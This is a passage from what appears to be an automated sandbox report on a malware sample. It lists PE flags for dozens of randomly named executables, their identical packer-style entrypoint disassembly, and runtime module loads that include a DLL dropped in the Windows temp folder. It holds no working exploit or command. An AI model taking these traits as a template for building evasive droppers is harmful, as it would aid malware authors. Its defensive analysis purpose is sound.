IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nndjbrh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"frphr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rlvbpdv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tdxhf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tvlvjll.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2686426.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4804844.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"466480.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nfxflv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"00680.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xxdfh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"604488.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jvxvt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjrxrhl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hptvf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rbffrbx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nffbnt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"88880.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"60248.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jtxbhtx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lvjhvdf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"284804.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"466842.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0246246.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nndjbrh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"frphr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rlvbpdv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tdxhf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tvlvjll.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2686426.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4804844.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"934cac5ad03fc72a950ffd7b65ae2eaf9852b7ea1d2562d880a55244f34bd963.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"282462.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"282462.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"282462.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"282462.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"282462.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"02006.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"02006.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02006.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"02006.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02006.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"6002286.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"682088.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"682088.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"682088.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"682088.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"682088.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"828684.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"828684.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"828684.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"828684.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"828684.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"44828.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"44828.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"44828.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"44828.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"44828.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"hnvfx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"hnvfx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hnvfx.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"hnvfx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"hnvfx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"ndtrth.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"ndtrth.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"ndtrth.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"ndtrth.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"ndtrth.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"vtttbl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"vtttbl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vtttbl.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"vtttbl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vtttbl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"vtttbl.exe\" loaded module \"KERNEL32.DLL\" at base 762f0000\n \"vtttbl.exe\" loaded module \"MSVCRT.DLL\" at base 76bb0000\n \"vtttbl.exe\" loaded module \"SHLWAPI.DLL\" at base 76520000\n \"vtttbl.exe\" loaded module \"USER32.DLL\" at base 763d0000\n \"vtttbl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"nbhbvdb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"nbhbvdb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nbhbvdb.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"nbhbvdb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nbhbvdb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"dljfl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"dljfl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dljfl.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"dljfl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dljfl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"tnhhvv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"tnhhvv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tnhhvv.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"tnhhvv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64088.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"64088.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"64088.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"64088.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"64088.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"6022622.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"6022622.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6022622.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"6022622.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6022622.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"6022622.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74bb0000\n \"fpfntvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"fpfntvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fpfntvj.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"fpfntvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fpfntvj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"hxtbvp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"hxtbvp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"hxtbvp.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"hxtbvp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dbjvvrj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"dbjvvrj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dbjvvrj.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"dbjvvrj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dbjvvrj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69d20000\n \"880026.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70790000\n \"880026.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"880026.exe\" loaded module \"KERNEL32\" at base 762f0000\n \"880026.exe\" loaded module 